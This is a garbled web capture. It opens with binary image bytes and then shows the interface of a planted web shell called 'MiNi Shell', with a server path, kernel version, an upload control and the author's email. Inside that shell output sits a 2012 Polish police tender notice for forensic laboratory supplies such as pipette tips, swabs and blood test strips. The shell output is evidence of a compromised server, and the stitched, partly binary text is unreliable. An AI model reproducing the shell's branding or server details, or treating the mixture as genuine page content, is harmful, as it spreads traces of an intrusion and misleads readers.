JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121003/378968-N-2012.html

<p class="kh_header"><b>Gdańsk: Dostawa materiałów laboratoryjnych dla KWP w Gdańsku</b><br>
<b>Numer ogłoszenia: 378968 - 2012; data zamieszczenia: 03.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Gdańsku , ul. Okopowa 15, 80-819 Gdańsk, woj. pomorskie, tel. 058 3214817, faks 058 3214810.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów laboratoryjnych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Druk ofertowy wraz z oświadczeniem o podwykonawcach
2.W przypadku ustanowienia pełnomocnika do reprezentowania w postępowaniu do oferty należy dołączyć 
pełnomocnictwo
3. Przy złożeniu oferty równoważnej, Wykonawca musi dołączyć folder wraz z numer katalogowym 
oferowanego produktu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 10:50, miejsce: Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Proteinaza K	- do stosowania w biologii molekularnej, w procesie izolacji DNA,
- w postaci liofilizowanego proszku,
- o aktywności 30 jednostek/mg proteiny,
- wolna od enzymów rozkładających kwasy nukleinowe (egzonukleaz, endonukleaz, RN-az,
- konfekcjonowana fabrycznie, w opakowaniu 25 mg	
Szt	
30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1	
Testy paskowe do ujawniania krwi	Szybkie testy kontaktowe HEMOPHAN TEST :
- stosowane w kryminalistyce do enzymatycznego ujawniania śladów krwi metodą kontaktową (dotykową),
-w postaci gotowych do użycia jednowskaźnikowych pasków testowych,
- dające barwną reakcję enzymatyczną w obecności hemoglobiny,
- o wysokiej czułości
 (wykrywalność od poziomu 5 erytrocytów w 1 ?l próbki),
- świeże (pochodzące z najnowszej serii produkcyjnej) oraz utrzymujące wymaganą czułość przez co najmniej 1 rok od daty odbioru jakościowo-ilościowego, z uwagi na szczególne ich przeznaczenie wykrywania śladów zawartości krwi w śladach biologicznych),
- konfekcjonowane fabrycznie, po 50 sztuk, w hermetycznie zamkniętych opakowaniach, opatrzonych numerem serii i datą ważności.
	
Op	
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Końcówki do pipet 
 0,1ul-10ul
rozm. M	
Końcówki do pipet:
- jednorazowego użycia, wykonane z tworzywa przezroczystego, chemicznie odpornego,
- wyposażone w filtry wewnętrzne dwufazowe hydrofobowe,
- o pojemności 0,1ul -10ul,
o długości 40 mm (?2 mm),
- kompatybilne do posiadanych jednokanałowych pipet Eppendorf Research o objętościach nastawnych 0,1 ul -2,5 ul i 
0,5 ul -10ul, z zachowaniem funkcji automatycznego zrzucania końcówek za pomocą zrzutnika,
- kompatybilne do posiadanych 12-kanałowych pipet Eppendorf Research o objętości nastawnej 0,5ul -10ul, z zachowaniem funkcji automatycznego zrzucania końcówek za pomocą zrzutnika, 
- sterylne, zamknięte w statywach, po 96 sztuk w każdym statywie,czyste do PCR (wolne od DNA pochodzenia ludzkiego, DN-az, RN-az i inhibitorów PCR), z załączonym lub dostępnym dla zamawiającego certyfikatem testowania,
- konfekcjonowane fabrycznie w opakowaniach kartonowych, w każdym opakowaniu 10 statywów po 96 końcówek	
Op	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Końcówki do pipet 
2-100 ul	
Końcówki do pipet:
- jednorazowego użycia, wykonane z tworzywa przezroczystego, chemicznie odpornego,
- wyposażone w filtry wewnętrzne dwufazowe hydrofobowe,
- o pojemności 2-100 ul,
- kompatybilne do posiadanych jednokanałowych pipet Eppendorf Research o objętościach nastawnych 2-20 ul, 10-100 ul, 20-200 ul, z zachowaniem funkcji automatycznego zrzucania końcówek za pomocą zrzutnika,
- kompatybilne do posiadanych 12-kanałowych pipet Eppendorf Research o objętości nastawnej 10-100 ul, z zachowaniem funkcji automatycznego zrzucania końcówek za pomocą zrzutnika,
- sterylne, zamknięte w statywach, po 96 sztuk w każdym statywie,
- czyste do PCR (wolne od DNA pochodzenia ludzkiego, DN-az, RN-az i inhibitorów PCR) z załączonym lub dostępnym dla zamawiającego certyfikatem testowania,
- konfekcjonowane fabrycznie w opakowaniach kartonowych, w każdym opakowaniu 10 statywów po 96 końcówek	
Op	
3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/ opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1	
Końcówki do pipet 
100-5000 ul	
Końcówki do pipet:
- jednorazowego użycia, wykonane z tworzywa przezroczystego, chemicznie odpornego,
- wyposażone w filtry wewnętrzne dwufazowe hydrofobowe,
- o pojemności 100ul-5000?l,
- kompatybilne do posiadanych jednokanałowych pipet Eppendorf Research o objętościach nastawnych 500-5000 ul, z zachowaniem funkcji automatycznego zrzucania końcówek za pomocą zrzutnika,
- sterylne, zamknięte w statywach, po 24 sztuki w każdym statywie,
- czyste do PCR (wolne od DNA pochodzenia ludzkiego, DNaz, RNaz i inhibitorów PCR) z załączonym lub dostępnym dla zamawiającego certyfikatem testowania,
Konfekcjonowane fabrycznie w opakowaniach kartonowych, w każdym opakowaniu 5 statywów po 24 końcówki.	
Op	
2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/ opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Probówki SAFE-LOCK poj. 1,5 ml.	
Probówki o poj. 1,5 ml:
- stożkowe, jednorazowego użycia, wykonane z tworzywa przezroczystego, bezbarwnego, chemicznie odpornego,
- matowe pole do opisu na kapslu oraz z boku probówki,
- zamykane nieodłącznymi, ściśle uszczelniającymi kapslami, wyposażonymi w zatrzaski typu safe-lock (zabezpieczającymi przed otwarciem się probówek podczas wysoko temperaturowych inkubacji), blokada kapsla zaopatrzona w haczyk, 
- czyste do PCR (wolne od DNA pochodzenia ludzkiego, DN-az, RN-az i inhibitorów PCR) z załączonym lub dostępnym dla zamawiającego certyfikatem testowania,
- konfekcjonowane fabrycznie, po 1000 sztuk w opakowaniu	
Op	
6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/ opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Mikrofiltracyjne zestawy do oczyszczania DNA	
Mikrofiltracyjne zestawy do oczyszczania DNA, Amicon Ultra - 0,5 ml lub równoważne:
- składające się z kolumny filtracyjnej wyposażonej w membranę Ultracel-30,
- do użycia z wykorzystaniem techniki wirowania,
- spełniające kryteria czystości wymagane w analizach DNA techniką PCR,
- pozwalające na uzycie siły wirowania do 14000 x g,
- dające możliwość zawieszenia DNA w objętości od 20-200 ul wody lub buforu TE,
- konfekcjonowane fabrycznie, po 500 zestawów w opakowaniu	
Op	
3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/ opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Mieszania:
Fenol:Chloroform:
alkohol 
pH8 25:24:1	
- do stosowania w biologii molekularnej,
- zbuforowana fabrycznie do pH8 za pomocą buforu 10 mM Tris pH 8.0, 1 mM EDTA,
- konfekcjonowana fabrycznie, po 100 ml w opakowaniu, z zalączonym buforem 10 mM Tris HCl pH 8. , 1 mM EDTA celem wyrównania fazy fenolowej do pH 8.0 (?0,2), jako wartości optymalne w procesie ekstrakcji DNA	
Szt.	
2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> dostawa materiałów laboratoryjnych dla KWP w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment/  opis przedmiotu zamówienia	Charakterystyka przedmiotu zamówienia	j.m.	Ilość
1.	
Wymazówka do zabezpieczania śladów biologicznych
                  	
Wymazówka jednorazowego użycia, przeznaczona do zabezpieczania śladów biologicznych na miejscu zdarzenia oraz pobierania śladów biologicznych do badań:
-	sterylna, czysta do PCR (wolna od DNA pochodzenia ludzkiego, DN-az, RN-az i inhibitorów PCR), z załączonymi lub dostępnymi dla Zamawiającego certyfikatami testowania wydanymi przez jednostkę badawczą, upoważnioną do tego rodzaju testowania,
-	składająca się z pałeczki wymazowej i tulejki ochronnej otwieranej z obu końców:
-pałeczka wymazowa wykonana z wytrzymałego na złamanie pręcika z tworzywa sztucznego, z mocno osadzonym na jego wolnym końcu z chłonnym (bawełnianym lub dakronowym) podłożem  przeznaczonym do pobrania materiału biologicznego, z trwale osadzonym na jego przeciwległym końcu uchwytem, będącym jednocześnie korkiem tulejki ochronnej, w której umieszcza się pałeczkę z materiałem zabezpieczonym do badań,
-	tulejka ochronna z tworzywa sztucznego wyposażona w etykietkę opisową, spełniająca funkcję ochronną dla zabezpieczonego materiału biologicznego, skonstruowana tak, aby podłoże z naniesionym materiałem biologicznym, umieszczone w całości wewnątrz tulejki, ulegało samoistnemu wyschnięciu,
-	konfekcjonowana fabrycznie, po 100 sztuk w opakowaniu opatrzonym numerem serii, datą produkcji, datą ważności, informacją o sterylności i czystości PCR oraz znakiem zgodności wyrobu z Dyrektywą 93/42/EEC,
-	długość patyczka z korkiem bez probówki min. 125 mm max. 155 mm.	
Szt.	
3.100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com